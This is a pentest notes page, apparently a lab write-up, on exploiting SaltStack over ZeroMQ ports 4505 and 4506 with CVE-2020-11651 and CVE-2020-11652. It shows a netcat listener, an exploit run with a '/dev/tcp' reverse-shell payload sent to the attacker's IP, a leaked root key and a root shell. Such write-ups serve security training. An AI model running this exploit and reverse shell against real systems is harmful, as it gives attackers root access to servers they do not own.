4505,4506 ZeroMQ

Exploiting ZeroMQ and Salt

Commonly found on ports 4505, 4506

4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0

Saltstack RCE - CVE-2020-11651 and CVE-2020-11652

GitHub - jasperla/CVE-2020-11651-poc: PoC exploit of CVE-2020-11651 and CVE-2020-11652GitHub

Need to install salt module first

pip install salt

Run listener on attacker machine


┌──(pikey㉿kali)-[~]
└─$ sudo nc -lvnp 22
[sudo] password for pikey: 
listening on [any] 22 ...
connect to [192.168.45.188] from (UNKNOWN) [192.168.219.62] 52424
sh: no job control in this shell
sh-4.2# whoami
whoami
root

Execute the python script to pop a rev shell

┌──(pikey㉿kali)-[~/Offsec/PG/Twiggy]
└─$ python3 48421.py --master 192.168.219.62  --exec "sh -i >& /dev/tcp/192.168.45.188/22 0>&1"
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/pikey/.local/lib/python3.11/site-packages/salt/transport/client.py:27: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.219.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: 3J+XIUkNF7hBV4vmBMThrOVNtk/MMCHmT7QoUZ9lmQL9u4EJafv/kEAnCeEpdZRrgO7g2dEL2Ho=
[+] Attemping to execute sh -i >& /dev/tcp/192.168.45.188/22 0>&1 on 192.168.219.62
[+] Successfully scheduled job: 20231111185139337282

Previous3306 MySQL Next5432 PostgreSQL DB

Last updated 2 years ago

hashtagCommonly found on ports 4505, 4506

hashtagSaltstack RCE - CVE-2020-11651 and CVE-2020-11652

Commonly found on ports 4505, 4506

Saltstack RCE - CVE-2020-11651 and CVE-2020-11652